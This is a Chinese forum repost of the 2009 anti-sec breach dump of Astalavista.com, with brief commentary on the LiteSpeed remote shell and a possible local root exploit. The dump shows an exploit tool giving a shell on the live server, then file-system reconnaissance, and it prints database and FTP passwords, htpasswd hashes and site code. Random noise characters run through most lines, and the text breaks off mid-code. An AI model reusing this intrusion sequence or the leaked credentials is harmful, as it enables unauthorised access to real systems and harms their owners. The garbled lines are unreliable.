中国网络渗透测试联盟

标题: Astalavista被蹂躏过程 [打印本页]
作者: admin    时间: 2012-11-6 21:07
标题: Astalavista被蹂躏过程
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
. d6 W" b( w  @# y1 Z! x
* q6 Y% _5 b# _[root@front3 ~]# curl -I litespeedtech.com
" J  Z' i) f% K! ?: qHTTP/1.1 200 OK) r, T1 m* u4 J  a
Date: Fri, 05 Jun 2009 22:54:51 GMT
! L' a/ _. {, z& i) h% eServer: LiteSpeed3 ^0 Q% I# t/ g$ h# r
0 j+ C# D- a. d2 n0 t8 m1 h
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-0 o0 y. u* G+ K* z& A' o

! Q7 W: ~( P! k: D5 Q! \3 ?有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。* L' ?% P2 Q" U; E. O4 K/ S

  Q1 o  Y; \  r" y% _4 a: p7 N$ J
. b5 ^, N. X5 S2 `; @- ^; z/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \
; c; b7 }2 m' O# B. X2 f$ X4 X- U/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \. m7 l# S+ q+ R! D
/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
1 m* w$ }; Q, x\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /
% {9 V, I) k: P) |: y! y. v        \/        \/                 \/        \/       \/                     \/                 \/! q6 P; n' R3 A% E7 x
                                  The Hacking & Security Community
" G* g6 U4 i% I' ?4 _( d, p9 J' X[+] Founded in 1997 by a hacker computer enthusiast
# ~- v1 u5 z  U, Y[-] Exposed in 2009 by anti-sec group
' w# F! e% h- t( y* W2 w; i, \* ^! e) M2 x& r
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:+ r' b+ r2 I' a  C
>> 03. Who’s behind the site?+ e3 D/ @: @- v4 A
>>
- i% q; |; t; ]: }" C0 _>> A team of security and IT professionals, and a countless number of contributors from all over the world.
! U, I  n- i% _+ h' ]9 p
  X" W+ l  D/ H4 G. w$ n( w>> 05. Is it true that the site is visited by script-kiddies and warez fans only?2 a* o& [" |6 A: v
>>
2 J# j, p+ |3 F/ W" T+ l& l6 B>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
  t$ t. t4 e/ J5 m# A! ?* Imilitary institutions." \$ U' y, _6 x6 a* \5 U6 p1 c
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
1 {- N4 y( G' h# v4 E+ R/ S1 Q, U1 v( b2 l
Why has Astalavista been targeted?" L  h% j1 g9 @( S
; [  [% j; }  ?  l7 y! f- z, ~
Other than the fact that they are not doing any of this for the “community” but( h3 Z' v# \9 d6 U2 x
for the money, they spread exploits for kids, claim to be a security community9 e# K' g# e2 U2 ^& O7 Z6 v
(with no real sense of security on their own servers), and they charge you $6.66- p5 O/ z& K$ Y0 P
per months to access a dead forum with a directory filled with public releases
0 X0 f. n- D, S! Q  E) Aand outdated / broken services.
4 O) _  M0 B8 E. d0 Q* {8 d  g
. Z/ ]. b. ]3 H, }0 _4 O) ?" UWe wanted to see how good that “team of security and IT professionals” really is.8 w2 s9 A* I8 a6 d. y4 D

% B# U3 P$ q& W" y+ u9 \Let’s begin.( q, f& f! Z* K2 C2 |/ q4 Z
4 W7 b2 [/ z) l# W9 E9 l, |# f
anti-sec:~# ./g0tshell astalavista.com -p 806 ~3 n2 ^! L* w5 ^7 E4 C
[+] Connecting to astalavista.com:80* F* d! W6 J. l7 @: O6 S0 z
[+] Grabbing banner…/ M- q- z- Q1 v1 i
LiteSpeed3 U, G6 ?9 D- n, V/ P
[+] Injecting shellcode…/ b4 N+ n" i& i; T
[-] Wait for it
5 A! J) {0 W$ D$ V; ~- n2 n& u( [  M2 \% [6 G' F
[~] We g0tshell
1 O' y! E; w5 z0 W/ h) `/ G# W- Huname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
' F/ ?! N+ f1 d) iID: uid=100(apache) gid=500(apache) groups=500(apache)* P5 r0 ?6 |" \  J! T; }1 i5 c
( j" Y: ]" f! m/ x' m. a
sh-3.2$ cat /etc/passwd* i5 U- b( Q9 Q
root:x:0:0:root:/root:/bin/bash
. @1 q6 L' ]1 d2 Y" P1 C- r% x- k* Ebin:x:1:1:bin:/bin:/sbin/nologin
7 e- v+ \, L- B* Pdaemon:x:2:2:daemon:/sbin:/sbin/nologin
- \0 \5 l6 U& M3 D9 X! ]% P2 J7 z% Badm:x:3:4:adm:/var/adm:/sbin/nologin
! j4 N, y1 J; V9 ], blp:x:4:7:lp:/var/spool/lpd:/sbin/nologin$ |# A: g6 p5 u# m) S' l
sync:x:5:0:sync:/sbin:/bin/sync) F& |, {9 n8 D8 {. R: T
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
2 F- Q+ U& f0 Rhalt:x:7:0:halt:/sbin:/sbin/halt8 c; H3 G0 \! S8 i, V: u( ~) D
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin6 W$ {- v' H# R3 {3 J
news:x:9:13:news:/etc/news:
: M: i* ?. @; a% T' vuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin) {, |. q: V# w! i  h* [" O0 }1 X
operator:x:11:0perator:/root:/sbin/nologin
) e6 Q3 ^- i0 _0 ~1 `6 ggames:x:12:100:games:/usr/games:/sbin/nologin
4 s+ E# F) u  g* t' Ggopher:x:13:30:gopher:/var/gopher:/sbin/nologin
. b2 @( Q0 e* s5 X1 [ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin, c/ q' q: `- S7 n
nobody:x:99:99:Nobody:/:/sbin/nologin
$ p, T; ^8 E& {9 ~3 x+ i  \. l- vrpm:x:37:37::/var/lib/rpm:/sbin/nologin
6 |- x" E1 }1 }- t* jdbus:x:81:81:System message bus:/:/sbin/nologin4 S# H- A+ @3 X- W* {' e3 A
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
7 O# o* }0 w$ j( j! U$ p4 y! e$ Dmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  S+ f( I' @" [8 i& i( f3 i! C$ rsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
8 P( Z! X" M$ `" ]vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin& `8 T3 Q9 e, z
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
, s+ l4 x2 F/ \, I5 K* \rpc:x:32:32ortmapper RPC user:/:/sbin/nologin% h) {* B; ^. b# H6 z
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin6 l& c1 d. S, S6 W' Y
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin) @9 e5 X) r. F
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin7 g7 ~4 L/ u# W% r4 B" `- N, \) S
pcap:x:77:77::/var/arpwatch:/sbin/nologin6 E9 a$ v* t& i4 c" @9 R
named:x:25:25:Named:/var/named:/sbin/nologin( P, Z! H0 Z) C. Y" i7 s
apache:x:100:500::/var/www:/bin/false
& |; ?. R$ g7 a9 z3 ediradmin:x:101:101::/usr/local/directadmin:/bin/bash* V) C& V0 J7 \+ ~" e6 o$ f# J
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
: r( T% t$ `( z  X& S* ~( dwebapps:x:500:501::/var/www/html:/bin/bash
7 K: H! `: A+ A) @) p2 x: Dmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash, r8 z7 P5 J  }6 ?% w# c1 d: `
admin:x:501:502::/home/admin:/bin/bash6 Q5 V# C! J7 Z$ L
jon:x:502:503::/home/jon:/bin/bash4 _/ ]( t, g0 b* ^) J2 X8 k4 `5 {. _, V
com:x:503:504::/home/com:/bin/bash
/ n5 L4 n) i) U( H) Xntp:x:38:38::/etc/ntp:/sbin/nologin
4 h3 S- [: P+ d/ Z- Eais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
, l" j9 M, n, [4 x7 q/ F/ Aastanet:x:504:505::/home/astanet:/bin/bash" ]8 v% w9 C" A8 o
avahi:x:70:70:Avahi daemon:/:/sbin/nologin6 x/ X7 s/ |; H& b) N
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin9 p8 O  W; |# E* e: Y
! k& J6 @; J7 s8 ^7 M$ b% a
sh-3.2$ cat /etc/hosts7 W' q# }6 l5 a. |" C7 g
# Do not remove the following line, or various programs- a8 ?/ d: F; S/ _" v) n
# that require network functionality will fail.) w: D3 _6 X8 [0 L+ z) D+ U4 Y) D
127.0.0.1       localhost.localdomain   localhost
9 n4 J! t% E0 [3 a::1     localhost6.localdomain6 localhost6
2 v6 n7 D/ R5 c7 w5 S+ m0 [& z80.74.154.172           asta1.astalavistaserver.com  R) ]6 D; U6 r* ]3 |

1 X+ S* y1 @2 i( ~6 Zsh-3.2$ pwd
  D7 k4 C, z* D( J/home/com/public_html
8 j: C8 O' G6 S8 Q  P: Q/ ]# E
' A6 r1 s( q) ]" Z- O& Ssh-3.2$ ls -la
* q0 C% W6 o0 S: P% t; V& Itotal 184602 h& Q4 _) F% d7 h2 \
drwxr-xr-x 30 com apache     4096 May 28 17:06 ., r/ @; T4 H% c7 J) q
drwx–x–x 11 com com        4096 Jun 25  2008 ..
  q$ p7 L" h; r4 B8 R- Z* Udrwxr-xr-x  2 com com        4096 Feb  2 19:29 admin& f0 H* y2 j) y8 `
drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
# g. L) k, J7 ~7 q- P& |4 Cdrwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
1 U) _+ t7 j' Jdrwxrwxrwx  2 com com        4096 May 19 00:50 config
' B# {: d. o2 {# T, p8 Q* R/ Cdrwxr-xr-x  2 com com        4096 Mar 20 11:05 core1 x- O6 k- p, U( D" O
drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules
+ i# Z% O- W, m( q* \4 k% q$ ?( idrwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing2 _" f0 ~) ^; j) A  a8 ], J5 A
drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo& }' ^7 o5 @  i+ p1 y; C& ?2 u
drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__
/ N' h5 s  v7 _$ F8 N  S-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php6 \" S. J7 y8 u; \
drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
/ W; a- i2 f$ l/ n4 P8 @. z& ]drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor0 w/ l% F5 U% j2 ]" z4 f
-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico7 W! {3 l6 E  x8 i* z4 z
drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
$ D4 R" V+ B4 w* g5 S+ n8 y5 B-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess  V: h$ b) ~8 c9 g5 t
-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak
! I  q) e- \) c$ X-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak! x/ o1 g9 _" J3 ^- {9 E
drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool7 C- G+ y$ Y* Z- ~8 c; Y$ N
drwxrwxrwx 14 com com        4096 Feb  2 19:29 images
6 D8 Q/ z" K3 v" G3 m# A-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php
. l) |1 D; S. q. y/ T, p9 Z% o; @drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
! w: l/ i' j- W& _2 udrwxr-xr-x  8 com com        4096 Feb  2 19:29 lang
- S3 e1 K' o9 P2 N! O! Mdrwxr-xr-x 22 com com        4096 Feb  2 19:29 lib$ R( k- p5 ^9 `8 b
drwxrwxrwx 12 com com        4096 Jun  2 07:47 media
4 h5 [) a+ V5 L8 x, i* D9 sdrwxr-xr-x  8 com com        4096 May 11 12:48 modifications: N3 j, D3 P! b0 F3 o
drwxr-xr-x 34 com com        4096 May 28 16:30 modules
- E4 \8 L& t5 i! Ddrwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin
0 U: c) i# o! Kdrwxrwxr-x 22 com com        4096 May 28 17:06 _new
! {+ [. T2 {( J: \drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old" {0 M6 e9 R. j9 G7 @
drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy
( R& ^  a- y0 m( Gdrwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy! \' p9 d# g0 f* ^) _% P# w
-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt" ?6 ], n" x2 F! B- Z. X
-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml6 O/ `$ H0 ~% ]& }$ X/ F
-rw-r–r–  1 com com         223 Mar 30 15:32 test.php
; p7 ?' [( m) a5 Gdrwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
) [7 ]; E, {" u* @- Cdrwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp
2 Q  h5 H# K0 S3 R, X& Ddrwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam. H* a+ w" {" i; |
% z8 J5 Y& \: J2 z! x1 C* ?
sh-3.2$ head -20 index.php0 T, M% w3 P- O
<?php; T2 w  U0 W7 Z  K  M

6 Z# N2 O8 \% z2 Y: n  |/**; F9 s% w7 h- s
* The main page for the CMS
* M" r0 F, P9 a6 v8 W* @copyright   CONTREXX CMS - COMVATION AG  r/ m! u2 T- G
* @author      Comvation Development Team
/ M! b0 \' i" `% s% j* h* @version     v1.0.9.10.1 stable* k! @7 O1 i4 t1 b  F
* @package        contrexx7 @$ x8 P/ z" F' S6 q6 L2 T) Y
* @subpackage    core
5 ?: s  o+ \) S0 q. V- P* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
- Q9 E2 }( K4 B/ U1 }* @since       v0.0.0.00 N! E( f% s$ g6 D
* @todo        Capitalize all class names in project) @* l* a5 l8 Q5 v, ?, t
* @uses        /config/configuration.php2 [+ s, Y1 S! U+ w) L: F" |
* @uses        /config/settings.php
- H6 B5 T0 d) _* @uses        /config/version.php7 j1 t) f* N9 A* s% }! M! o% [
* @uses        /core/API.php
( ^# {! H$ m% ]" i+ Y: D* @uses        /core_modules/cache/index.class.php
! i# [& `% N# a% k# M5 f* @uses        /core/error.class.php
! M5 w* p& s+ w+ ^/ m6 K: k* @uses        /core_modules/banner/index.class.php
! J8 M0 ^# g; `3 ~* @uses        /core_modules/contact/index.class.php
+ s) m5 o3 D% z' r
( x  w/ d- k# n2 Ksh-3.2$ cd config/, q/ U* C0 Y0 L: P' N7 a
sh-3.2$ ls -la8 e$ d& h! M# R: T$ F, E' f
total 328 W# T. R4 Q5 p5 D. E
drwxrwxrwx  2 com com    4096 May 19 00:50 .. U  l" |* y. [9 }
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
: x+ e% f2 C  i4 s4 w4 [- y& {! @-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php
8 i* }! |5 g0 V; q* M2 l7 k' x-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php
: }4 Z2 ~! c* J" T* ?% a  c  M-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php- }1 c+ a) X) U7 Z; \) |  ~/ w
-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php- l3 m' X. Y) z6 ~4 ~7 g, v+ ]

- j' P& V; N. P, H; ysh-3.2$ cat configuration.php
; C8 h) n; P+ s' G0 T[snip]
/ F% I( k# v2 N0 ^* b" }$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost8 n% t" @! k- Y! |# M
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name9 J& N* I# P; q! P* P
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix8 Q7 }+ U/ ~2 Y: y  S3 Y4 [
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
( o- S+ y8 Q/ {- K: u+ W$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password0 x* ]. y4 j7 X: G
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)+ P! y$ U/ j4 Z9 K6 |$ Z9 \2 y
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..). i+ w3 T4 i" Q8 d  h$ f9 T( T* J0 m
[snip]
6 i) k! k8 Z' C+ k# e$_FTPCONFIG['is_activated'] = true; // Ftp support true or false2 C6 g) V9 @: Y2 }2 i8 I% _2 a: `
$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode
" v- s0 ^, L" k( k8 q$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost
: V0 r9 N0 A. M4 p/ V$_FTPCONFIG['port'] = 21; // Ftp remote port. L- \1 |/ k$ f% z$ P# @
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
# m3 _, P/ [( ~- p8 D9 B$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password4 f2 ]* }1 N# e) `2 H  c1 i
$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms- H3 k$ |8 \* v4 Q& l6 Q
+ p# v; G  A  v" ~
sh-3.2$ cd ..
( q9 p- v: O" v, L3 H' }sh-3.2$ cd dvd/
' J) \5 W9 i# `7 }7 csh-3.2$ ls -la
' t4 D0 w+ U! ]  j2 k% h  Wtotal 2913780
3 S# A) l/ W- B) o* `drwxr-xr-x  2 com com          4096 Sep  9  2008 .9 V/ B5 l( `# g2 ^1 \' H3 B5 d
drwxr-xr-x 30 com apache       4096 May 28 17:06 ..
: N0 H" K0 ~5 i3 {# ?0 t4 ~-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar
2 b2 V8 [0 X3 J-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar
6 l) \0 ~) g5 b* E+ [4 I0 z-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar+ v3 O6 K7 r1 O5 }( g2 ~
-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess
0 u+ g5 {& y6 u" j) ?( i' y
( r7 W7 q$ I+ P2 Ksh-3.2$ cat .htaccess; W# t$ m: F$ Q. n" E& L9 k8 ^
authType Basic
2 ]( p' |. {6 F% VauthName DVD
. h; _0 o% W/ g2 ?0 D# e3 c' PauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
9 W5 q+ \5 ~. ]+ K, I$ trequire valid-user
% A9 z" O9 I, u4 L; p) V* ]& r# s) S! G4 P% n
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd2 [+ j( W! K$ Z) a$ T
DVDdownload:CRD8cuY6.MPT6
- R( X5 `! X/ P: M3 u( `) rDVDdownload2:CR8a36.wluFMg9 S5 l$ w1 p! c# ?7 \7 E
5 \3 B7 M2 F  G; G
sh-3.2$ cat test.php1 o4 Z& ^; {  Z" d7 H. I$ A
<?php
  ]- D& d2 u7 k. y. Q$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;5 _# X% p; s9 E
$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));
# n- {9 T+ A& ~# x% Zecho $url;
' M$ ~- w: n/ }; y9 M4 S?>
$ \% L* t4 E9 i- A% V& Z' |) K7 x0 ~3 m' W4 o* O9 k
sh-3.2$ cd modifications/
( K& C4 H$ g7 g' n$ {- k. Z  [! {/ [sh-3.2$ ls -la
) ?; c) \4 Z+ Rtotal 327 T6 Y9 b6 [5 [9 I8 Z
drwxr-xr-x  8 com com    4096 May 11 12:48 ., X" ~* H2 |, p) @, b" b4 a
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..% Z/ G7 L' G+ _4 @/ y
drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng
. M" K) S! C  r# r4 jdrwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs
5 j/ c) p. S$ P2 m5 b% Z2 |drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools
& `4 t' _/ Z+ X4 b, [: F# Q8 Xdrwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
+ L. ]4 U8 U$ ~& r5 V, cdrwxr-xr-x  2 com com    4096 Feb  2 19:33 search! ~" I6 F" Q: v/ J
drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
1 K: p  M' i5 a8 ]; b
1 h6 O4 a, ~/ ?- {7 _sh-3.2$ ls -R1 @9 r; n6 f5 b$ ^& @- d6 w
.:
2 ?* c2 U9 `" U4 ^com_avtng  cronjobs  onlinetools  pjirc  search  _tmp4 ?7 c$ E# j, \7 V, z+ Q
7 x  b1 R$ O' D7 b
./com_avtng:
9 N: E$ I& w# X' D. Cavtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts
+ a  d) k- V7 [/ ?3 S8 ?  T4 o3 ]: X6 f# ~6 s
./com_avtng/scripts:5 t- b' ]& O& r$ F4 D  v
popunder.js' B+ j8 e, Q5 C8 J# c

; B( E& l+ |4 m" Q./cronjobs:
8 e" n; n7 ]* T+ V8 o0 _5 k" wexploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp
% N0 V. o* j5 e+ C
& P" a  K( v3 ~$ h1 a, C( n, |7 O./cronjobs/tmp:2 N2 ?, J7 ^; Z8 y2 N$ n! T- X+ ?
contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv! @/ T! l1 ~/ p0 A8 J

2 U! e! D  X  Q& @, s) Q# \1 W./onlinetools:
& E5 i- e( N! ~# n( \% \index.php
) L% B# D0 D' Q% r. r1 ~0 l6 b# s' u6 Z
./pjirc:" B0 S9 y  f# `$ [" L  x0 z
a_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt
/ `5 x* J& I; y6 wAppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt( E9 B* v" Y+ E+ g6 O
background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
1 G' b8 q+ ~, l3 R3 N% f: Q2 z8 C" x" E- Y2 n1 q* g8 c7 D
./pjirc/img:
1 t, ?  {0 `3 t) lange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif
! W7 y- J# j. Z& E. garbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   . G7 D8 o0 f2 p/ g1 E6 G
verre-eau.gif
* b( m5 i) A1 {* _! |+ z" a* Aargh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  
, S/ h8 O) Q3 t/ ^* l5 A6 ^verre-vin.gif
( |# ~  D! R2 ]: d& H' `2 a# G; Rballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif
. O# Y& r$ T9 n2 x+ Fbiere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif+ k; y4 q4 D  P& \

! i. U, U4 {5 F' d4 }$ x./pjirc/snd:- F+ ]4 F- h2 y1 L) L# M
bell2.au  ding.au
- z! _$ K8 s  r7 q4 V9 B) U8 q0 Z8 V( K. T; C0 B
./search:7 s+ K" ~6 ?( {0 @1 g- r- U2 G
searchEngines.php  search.php0 J& |2 w, c4 @& X8 A3 H6 ~1 D
/ @6 Z( _' Q6 H) V2 b! {. [
./_tmp:
9 g$ a" |+ D2 K% y2 qdefaultPorts.php  defaultPorts.txt) O- @; L; }0 U# ^" }# P5 L: j

5 r6 o( M" p" T! J, y: osh-3.2$ cd cronjobs/) L, @' i. `' j1 Y
sh-3.2$ cat exploits.php3 H6 i, q1 B5 O$ t; H- ~
[snip]7 V9 W8 q7 Q' ~/ P2 d% V5 f
$categories   = array();% T- p- O, m7 K9 k6 F
$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;( t/ Z8 a9 d$ x1 H4 R
$expolits     = file($milw0rmFile);  C) `1 R& h5 K! e# g: V
$comExploits  = array();5 z& f3 @7 k: a
[snip]+ q+ P% h; w, |+ {) `: b
// manage data
8 ~* Y1 I' t7 V: R/ p, r- F4 k& sfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
) G( C, R& ~% c/ Z5 Q
6 R. X/ X, W: Q5 s  c$ V    // get path and title0 m6 G; `# v8 \4 o1 S, v: a
    $expolits[$x] = trim($expolits[$x]);' }1 u! ]6 P2 a, w( C6 t
    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
1 U% H3 N) g6 d6 i# c7 D- s    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
* d/ o# ^/ W. W. n0 e* ?- P- `) T. Z$ e  N$ i9 ?( T4 ?
    // check if file exists
2 F" [7 x% ~3 u+ ~9 d- G    if (file_exists($path)) {
) h# U4 [8 ?3 R- m$ r6 A8 e# C3 [8 r4 J
        $text = file_get_contents($path);% R) {! o# ^5 M  m1 }0 G8 e9 o4 s
0 W6 W7 P6 D1 s7 S: N/ f
        // get content and date
4 X9 H& @+ r8 l        //$text = htmlspecialchars($text, ENT_QUOTES);
8 c3 X  ~* o* \9 ^& \% M+ @3 K5 k        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));
* H, c+ r" D: J# B/ F        if ($tmptext != ”) {1 d: u6 W+ m6 \1 a
            $text = $tmptext;
; Q8 N9 C, \+ G) G; V3 F7 Y        } else {" [. N1 U7 m; I( C& k+ V
            $text = addslashes(htmlentities($text,  ENT_QUOTES));
  D0 x* u$ a1 v) \5 X& j& u        }) |4 ]- d/ g' ^3 V/ H3 h
        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));0 J0 `  P1 B- D" x2 a" f% s- g
        $tmp  = explode('-', $date);! v8 T4 V1 b3 E
        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
5 {9 W  j/ l( s' t7 W5 _! R        $cat  = getCategory ($path);1 x% z5 a- A) F# Q
        $ext  = pathinfo(basename($path));
$ ^% g' q  {9 i) U' C        $ext  = $ext['extension'];9 @/ ~/ w$ g2 Q, a2 S+ `
        $qStr = ”
6 p/ I0 r- x  W$ W/ U7 A* Q            SELECT  `id`  M; c* s( u; M9 @0 w3 _
            FROM    `contrexx_module_exploits`# _, e6 d  V9 F6 O2 J' N( e
            WHERE   `title`  =  ‘” . $title . “‘, v4 v3 i+ e. c4 _1 m# `
            AND     `date`   =  ‘” . $date . “‘- W  c) p, T6 r& _
        “;
2 E7 m) o( r: H        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;7 q5 k7 O& ?' v1 N* L' ~
        $q = $_objDB->query($qStr);
! k* f# d  l2 X' X, J- a! i, _0 |' o) M3 r' a. Y- M9 u9 c1 T
        if ($q->numRows() == 0) {
" ?: n0 T- X  L( U- b' M' X: P+ Z( w4 o9 ^, V% C5 g
            // prepare array/ Y7 U7 A; ^( }4 B
            $comExploits[$x]['date']      = $date;
- M% L  l" Q0 W' c6 }            $comExploits[$x]['title']     = $title;; H. O8 G% H- C+ \  Z% p8 }3 J- L
            $comExploits[$x]['author']    = ‘milw0rm’;
( C  T8 \; V* D$ D5 j            $comExploits[$x]['text']      = $text;
) s$ d' Z+ m% ^! m; D0 H3 e            $comExploits[$x]['source']    = $ext;
3 s& F0 r. @; v0 ]            $comExploits[$x]['url1']      = ”;
' p- m' j; \# S; F8 o            $comExploits[$x]['url2']      = ”;6 @+ \  M5 F- {: m; J" @7 P
            $comExploits[$x]['catid']     = $cat;
5 _. f  h) |, F, c4 ^+ g            $comExploits[$x]['lang']      = ‘2′;: c, @% r( h; X1 B+ N) }$ z9 Q
